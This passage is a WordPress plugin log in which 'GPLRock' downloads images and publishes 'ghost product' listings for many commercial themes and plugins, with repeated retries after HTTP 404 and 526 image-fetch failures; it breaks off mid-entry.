discy-social-questions-and-answers-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-44161be3.png [05-Apr-2026 16:53:19 UTC] GPLRock: Ghost product published with image - Product ID: discy-social-questions-and-answers-wordpress-theme [05-Apr-2026 16:53:22 UTC] GPLRock: Image downloaded successfully for product freshio-organic-food-store-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cd3a87eb.png [05-Apr-2026 16:53:22 UTC] GPLRock: Using pre-downloaded image for product freshio-organic-food-store-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cd3a87eb.png [05-Apr-2026 16:53:22 UTC] GPLRock: Ghost product published with image - Product ID: freshio-organic-food-store-wordpress-theme [05-Apr-2026 16:53:24 UTC] GPLRock: Image downloaded successfully for product razzi-multipurpose-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-68407b66.jpg [05-Apr-2026 16:53:24 UTC] GPLRock: Using pre-downloaded image for product razzi-multipurpose-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-68407b66.jpg [05-Apr-2026 16:53:24 UTC] GPLRock: Ghost product published with image - Product ID: razzi-multipurpose-woocommerce-wordpress-theme [05-Apr-2026 16:53:25 UTC] GPLRock: Image downloaded successfully for product foodbook-online-food-ordering-delivery-system-for-wordpress-with-one-click-order-printing (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6316d56a.jpg [05-Apr-2026 16:53:25 UTC] GPLRock: Using pre-downloaded image for product foodbook-online-food-ordering-delivery-system-for-wordpress-with-one-click-order-printing: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6316d56a.jpg [05-Apr-2026 16:53:25 UTC] GPLRock: Ghost product published with image - Product ID: foodbook-online-food-ordering-delivery-system-for-wordpress-with-one-click-order-printing [05-Apr-2026 16:53:27 UTC] GPLRock: Image downloaded successfully for product aiomatic-automatic-ai-content-writer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e237fdff.jpg [05-Apr-2026 16:53:27 UTC] GPLRock: Using pre-downloaded image for product aiomatic-automatic-ai-content-writer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e237fdff.jpg [05-Apr-2026 16:53:27 UTC] GPLRock: Ghost product published with image - Product ID: aiomatic-automatic-ai-content-writer [05-Apr-2026 16:56:34 UTC] GPLRock: Image downloaded successfully for product rnb-woocommerce-bookings-rental-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b5f7fda0.jpg [05-Apr-2026 16:56:34 UTC] GPLRock: Using pre-downloaded image for product rnb-woocommerce-bookings-rental-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b5f7fda0.jpg [05-Apr-2026 16:56:34 UTC] GPLRock: Ghost product published with image - Product ID: rnb-woocommerce-bookings-rental-plugin [05-Apr-2026 16:56:35 UTC] GPLRock: Image downloaded successfully for product hide-my-wp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e9998792.jpg [05-Apr-2026 16:56:35 UTC] GPLRock: Using pre-downloaded image for product hide-my-wp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e9998792.jpg [05-Apr-2026 16:56:35 UTC] GPLRock: Ghost product published with image - Product ID: hide-my-wp [05-Apr-2026 16:56:37 UTC] GPLRock: Image downloaded successfully for product happy-elementor-addons-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aa8e3bea.webp [05-Apr-2026 16:56:37 UTC] GPLRock: Using pre-downloaded image for product happy-elementor-addons-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aa8e3bea.webp [05-Apr-2026 16:56:37 UTC] GPLRock: Ghost product published with image - Product ID: happy-elementor-addons-pro [05-Apr-2026 16:56:38 UTC] GPLRock: Image downloaded successfully for product woocommerce-order-status-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6f07b12c.jpg [05-Apr-2026 16:56:38 UTC] GPLRock: Using pre-downloaded image for product woocommerce-order-status-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6f07b12c.jpg [05-Apr-2026 16:56:38 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-order-status-manager [05-Apr-2026 16:56:40 UTC] GPLRock: Image downloaded successfully for product whatsapp-chat-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fe2e9348.jpg [05-Apr-2026 16:56:40 UTC] GPLRock: Using pre-downloaded image for product whatsapp-chat-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fe2e9348.jpg [05-Apr-2026 16:56:40 UTC] GPLRock: Ghost product published with image - Product ID: whatsapp-chat-wordpress [05-Apr-2026 16:56:41 UTC] GPLRock: Image downloaded successfully for product ultimate-member-social-login-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9a4f436d.jpg [05-Apr-2026 16:56:42 UTC] GPLRock: Using pre-downloaded image for product ultimate-member-social-login-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9a4f436d.jpg [05-Apr-2026 16:56:42 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-member-social-login-addon [05-Apr-2026 16:56:43 UTC] GPLRock: Image downloaded successfully for product jetappointments (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d8e15115.jpg [05-Apr-2026 16:56:43 UTC] GPLRock: Using pre-downloaded image for product jetappointments: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d8e15115.jpg [05-Apr-2026 16:56:43 UTC] GPLRock: Ghost product published with image - Product ID: jetappointments [05-Apr-2026 16:56:45 UTC] GPLRock: Image downloaded successfully for product all-products-for-woocommerce-subscriptions (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-60547f45.png [05-Apr-2026 16:56:45 UTC] GPLRock: Using pre-downloaded image for product all-products-for-woocommerce-subscriptions: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-60547f45.png [05-Apr-2026 16:56:45 UTC] GPLRock: Ghost product published with image - Product ID: all-products-for-woocommerce-subscriptions [05-Apr-2026 16:56:48 UTC] GPLRock: Image download failed for product gameleon-wordpress-arcade-theme-news-magazine (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 16:56:52 UTC] GPLRock: Image download failed for product gameleon-wordpress-arcade-theme-news-magazine (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 16:56:56 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/05/Gameleon-WordPress-Arcade-Theme-News-Magazine.jpg for product gameleon-wordpress-arcade-theme-news-magazine after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 16:56:58 UTC] GPLRock: Image download failed for product gameleon-wordpress-arcade-theme-news-magazine (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 16:57:02 UTC] GPLRock: Image download failed for product gameleon-wordpress-arcade-theme-news-magazine (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 16:57:06 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/05/Gameleon-WordPress-Arcade-Theme-News-Magazine.jpg for product gameleon-wordpress-arcade-theme-news-magazine after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 16:57:06 UTC] GPLRock WARNING: Image download failed for product gameleon-wordpress-arcade-theme-news-magazine. URL: https://www.gplrock.com/wp-content/uploads/2021/05/Gameleon-WordPress-Arcade-Theme-News-Magazine.jpg [05-Apr-2026 16:57:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gameleon-wordpress-arcade-theme-news-magazine [05-Apr-2026 16:57:08 UTC] GPLRock: Image downloaded successfully for product cryptro-cryptocurrency-blockchain-bitcoin-financial-technology (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3d4b4961.png [05-Apr-2026 16:57:08 UTC] GPLRock: Using pre-downloaded image for product cryptro-cryptocurrency-blockchain-bitcoin-financial-technology: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3d4b4961.png [05-Apr-2026 16:57:08 UTC] GPLRock: Ghost product published with image - Product ID: cryptro-cryptocurrency-blockchain-bitcoin-financial-technology [05-Apr-2026 16:59:08 UTC] GPLRock: Image downloaded successfully for product the-hanger-modern-classic-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ee6b2971.jpg [05-Apr-2026 16:59:08 UTC] GPLRock: Using pre-downloaded image for product the-hanger-modern-classic-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ee6b2971.jpg [05-Apr-2026 16:59:08 UTC] GPLRock: Ghost product published with image - Product ID: the-hanger-modern-classic-woocommerce-theme [05-Apr-2026 16:59:11 UTC] GPLRock: Image download failed for product jetthemecore-for-elementor (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 16:59:15 UTC] GPLRock: Image download failed for product jetthemecore-for-elementor (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 16:59:19 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/10/JetThemeCore-For-Elementor.png for product jetthemecore-for-elementor after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 16:59:22 UTC] GPLRock: Image download failed for product jetthemecore-for-elementor (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 16:59:26 UTC] GPLRock: Image download failed for product jetthemecore-for-elementor (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 16:59:30 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/10/JetThemeCore-For-Elementor.png for product jetthemecore-for-elementor after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 16:59:30 UTC] GPLRock WARNING: Image download failed for product jetthemecore-for-elementor. URL: https://www.gplrock.com/wp-content/uploads/2020/10/JetThemeCore-For-Elementor.png [05-Apr-2026 16:59:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jetthemecore-for-elementor [05-Apr-2026 16:59:31 UTC] GPLRock: Image downloaded successfully for product jetproductgallery-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a39cae52.jpg [05-Apr-2026 16:59:31 UTC] GPLRock: Using pre-downloaded image for product jetproductgallery-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a39cae52.jpg [05-Apr-2026 16:59:31 UTC] GPLRock: Ghost product published with image - Product ID: jetproductgallery-for-elementor [05-Apr-2026 16:59:32 UTC] GPLRock: Image downloaded successfully for product jetcomparewishlist-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b5090207.jpg [05-Apr-2026 16:59:32 UTC] GPLRock: Using pre-downloaded image for product jetcomparewishlist-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b5090207.jpg [05-Apr-2026 16:59:32 UTC] GPLRock: Ghost product published with image - Product ID: jetcomparewishlist-for-elementor [05-Apr-2026 16:59:34 UTC] GPLRock: Image downloaded successfully for product seopress-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-46e3fe94.jpg [05-Apr-2026 16:59:34 UTC] GPLRock: Using pre-downloaded image for product seopress-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-46e3fe94.jpg [05-Apr-2026 16:59:34 UTC] GPLRock: Ghost product published with image - Product ID: seopress-pro [05-Apr-2026 16:59:35 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-advanced-reviews-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ba5cab52.jpg [05-Apr-2026 16:59:35 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-advanced-reviews-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ba5cab52.jpg [05-Apr-2026 16:59:35 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-advanced-reviews-premium [05-Apr-2026 16:59:37 UTC] GPLRock: Image downloaded successfully for product polylang-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f5d61dd1.jpg [05-Apr-2026 16:59:37 UTC] GPLRock: Using pre-downloaded image for product polylang-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f5d61dd1.jpg [05-Apr-2026 16:59:37 UTC] GPLRock: Ghost product published with image - Product ID: polylang-pro [05-Apr-2026 16:59:38 UTC] GPLRock: Image downloaded successfully for product ninja-popups-popup-plugin-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-476dbeca.jpg [05-Apr-2026 16:59:39 UTC] GPLRock: Using pre-downloaded image for product ninja-popups-popup-plugin-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-476dbeca.jpg [05-Apr-2026 16:59:39 UTC] GPLRock: Ghost product published with image - Product ID: ninja-popups-popup-plugin-for-wordpress [05-Apr-2026 16:59:40 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-software-licensing (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1782d352.jpg [05-Apr-2026 16:59:40 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-software-licensing: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1782d352.jpg [05-Apr-2026 16:59:40 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-software-licensing [05-Apr-2026 16:59:42 UTC] GPLRock: Image downloaded successfully for product jobseek-job-board-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84a5f381.jpg [05-Apr-2026 16:59:42 UTC] GPLRock: Using pre-downloaded image for product jobseek-job-board-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84a5f381.jpg [05-Apr-2026 16:59:42 UTC] GPLRock: Ghost product published with image - Product ID: jobseek-job-board-wordpress-theme [05-Apr-2026 17:00:59 UTC] GPLRock: Image downloaded successfully for product livesay-event-conference-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9cf30e5c.webp [05-Apr-2026 17:00:59 UTC] GPLRock: Using pre-downloaded image for product livesay-event-conference-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9cf30e5c.webp [05-Apr-2026 17:00:59 UTC] GPLRock: Ghost product published with image - Product ID: livesay-event-conference-wordpress-theme [05-Apr-2026 17:01:00 UTC] GPLRock: Image download failed for product zaya-modern-personal-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:01:02 UTC] GPLRock: Image download failed for product zaya-modern-personal-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:01:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zaya---modern-personal-blog-wordpress-theme-2110.webp for product zaya-modern-personal-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:01:04 UTC] GPLRock: Image download failed for product zaya-modern-personal-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:01:06 UTC] GPLRock: Image download failed for product zaya-modern-personal-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:01:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zaya---modern-personal-blog-wordpress-theme-2110.webp for product zaya-modern-personal-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:01:08 UTC] GPLRock WARNING: Image download failed for product zaya-modern-personal-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/zaya---modern-personal-blog-wordpress-theme-2110.webp [05-Apr-2026 17:01:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zaya-modern-personal-blog-wordpress-theme [05-Apr-2026 17:01:09 UTC] GPLRock: Image download failed for product kidz-kids-store-and-baby-shop-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:01:11 UTC] GPLRock: Image download failed for product kidz-kids-store-and-baby-shop-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:11:19 UTC] GPLRock: Image download failed for product bloombox-ajax-showcase-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:11:21 UTC] GPLRock: Image download failed for product bloombox-ajax-showcase-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:11:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bloombox---ajax-showcase-photography-wordpress-theme-5220.webp for product bloombox-ajax-showcase-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:11:23 UTC] GPLRock: Image download failed for product bloombox-ajax-showcase-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:11:25 UTC] GPLRock: Image download failed for product bloombox-ajax-showcase-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:11:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bloombox---ajax-showcase-photography-wordpress-theme-5220.webp for product bloombox-ajax-showcase-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:11:27 UTC] GPLRock WARNING: Image download failed for product bloombox-ajax-showcase-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bloombox---ajax-showcase-photography-wordpress-theme-5220.webp [05-Apr-2026 17:11:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bloombox-ajax-showcase-photography-wordpress-theme [05-Apr-2026 17:11:27 UTC] GPLRock: Image downloaded successfully for product buzz-club-night-club-dj-music-festival-event-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2f9437bb.webp [05-Apr-2026 17:11:27 UTC] GPLRock: Using pre-downloaded image for product buzz-club-night-club-dj-music-festival-event-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2f9437bb.webp [05-Apr-2026 17:11:27 UTC] GPLRock: Ghost product published with image - Product ID: buzz-club-night-club-dj-music-festival-event-wordpress-theme [05-Apr-2026 17:11:28 UTC] GPLRock: Image download failed for product fabiflex-textile-industry-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:11:30 UTC] GPLRock: Image download failed for product fabiflex-textile-industry-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:11:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fabiflex---textile-industry-wordpress-theme-13643.webp for product fabiflex-textile-industry-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:11:32 UTC] GPLRock: Image download failed for product fabiflex-textile-industry-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:11:34 UTC] GPLRock: Image download failed for product fabiflex-textile-industry-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:11:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fabiflex---textile-industry-wordpress-theme-13643.webp for product fabiflex-textile-industry-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:11:36 UTC] GPLRock WARNING: Image download failed for product fabiflex-textile-industry-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fabiflex---textile-industry-wordpress-theme-13643.webp [05-Apr-2026 17:11:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fabiflex-textile-industry-wordpress-theme [05-Apr-2026 17:11:36 UTC] GPLRock: Image downloaded successfully for product remake-minimal-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8270273a.webp [05-Apr-2026 17:11:36 UTC] GPLRock: Using pre-downloaded image for product remake-minimal-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8270273a.webp [05-Apr-2026 17:11:36 UTC] GPLRock: Ghost product published with image - Product ID: remake-minimal-theme [05-Apr-2026 17:11:36 UTC] GPLRock: Image download failed for product oitech-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:11:38 UTC] GPLRock: Image download failed for product oitech-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:11:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oitech---technology-wordpress-theme-17210.webp for product oitech-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:11:41 UTC] GPLRock: Image download failed for product oitech-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:11:43 UTC] GPLRock: Image download failed for product oitech-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:11:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oitech---technology-wordpress-theme-17210.webp for product oitech-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:11:45 UTC] GPLRock WARNING: Image download failed for product oitech-technology-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/oitech---technology-wordpress-theme-17210.webp [05-Apr-2026 17:11:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: oitech-technology-wordpress-theme [05-Apr-2026 17:11:45 UTC] GPLRock: Image download failed for product fototag-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:11:47 UTC] GPLRock: Image download failed for product fototag-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:11:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fototag--photography-wordpress-theme-32293.webp for product fototag-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:11:49 UTC] GPLRock: Image download failed for product fototag-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:11:51 UTC] GPLRock: Image download failed for product fototag-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:11:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fototag--photography-wordpress-theme-32293.webp for product fototag-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:11:53 UTC] GPLRock WARNING: Image download failed for product fototag-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fototag--photography-wordpress-theme-32293.webp [05-Apr-2026 17:11:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fototag-photography-wordpress-theme [05-Apr-2026 17:11:54 UTC] GPLRock: Image download failed for product tiare-wedding-vendor-directory-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:11:56 UTC] GPLRock: Image download failed for product tiare-wedding-vendor-directory-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:11:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tiare---wedding-vendor-directory-wordpress-theme-1700.webp for product tiare-wedding-vendor-directory-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:11:58 UTC] GPLRock: Image download failed for product tiare-wedding-vendor-directory-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:12:00 UTC] GPLRock: Image download failed for product tiare-wedding-vendor-directory-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:12:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tiare---wedding-vendor-directory-wordpress-theme-1700.webp for product tiare-wedding-vendor-directory-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:12:02 UTC] GPLRock WARNING: Image download failed for product tiare-wedding-vendor-directory-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tiare---wedding-vendor-directory-wordpress-theme-1700.webp [05-Apr-2026 17:12:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tiare-wedding-vendor-directory-wordpress-theme [05-Apr-2026 17:12:03 UTC] GPLRock: Image download failed for product car-rental-wordpress-theme-landing-page (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:12:05 UTC] GPLRock: Image download failed for product car-rental-wordpress-theme-landing-page (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:12:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/car-rental-wordpress-theme-landing-page-22687.webp for product car-rental-wordpress-theme-landing-page after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:12:07 UTC] GPLRock: Image download failed for product car-rental-wordpress-theme-landing-page (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:12:09 UTC] GPLRock: Image download failed for product car-rental-wordpress-theme-landing-page (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:12:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/car-rental-wordpress-theme-landing-page-22687.webp for product car-rental-wordpress-theme-landing-page after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:12:11 UTC] GPLRock WARNING: Image download failed for product car-rental-wordpress-theme-landing-page. URL: https://meldwp.com/wp-content/uploads/car-rental-wordpress-theme-landing-page-22687.webp [05-Apr-2026 17:12:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: car-rental-wordpress-theme-landing-page [05-Apr-2026 17:12:11 UTC] GPLRock: Image download failed for product grafik-architecture-and-design-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:12:13 UTC] GPLRock: Image download failed for product grafik-architecture-and-design-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:12:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grafik---architecture-and-design-portfolio-wordpress-theme-32545.webp for product grafik-architecture-and-design-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:12:16 UTC] GPLRock: Image download failed for product grafik-architecture-and-design-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:12:18 UTC] GPLRock: Image download failed for product grafik-architecture-and-design-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:12:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grafik---architecture-and-design-portfolio-wordpress-theme-32545.webp for product grafik-architecture-and-design-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:12:20 UTC] GPLRock WARNING: Image download failed for product grafik-architecture-and-design-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/grafik---architecture-and-design-portfolio-wordpress-theme-32545.webp [05-Apr-2026 17:12:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: grafik-architecture-and-design-portfolio-wordpress-theme [05-Apr-2026 17:12:20 UTC] GPLRock: Image download failed for product trusmile-dentist-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:12:22 UTC] GPLRock: Image download failed for product trusmile-dentist-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:12:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/trusmile---dentist-wordpress-theme-3938.webp for product trusmile-dentist-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:12:24 UTC] GPLRock: Image download failed for product trusmile-dentist-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:12:26 UTC] GPLRock: Image download 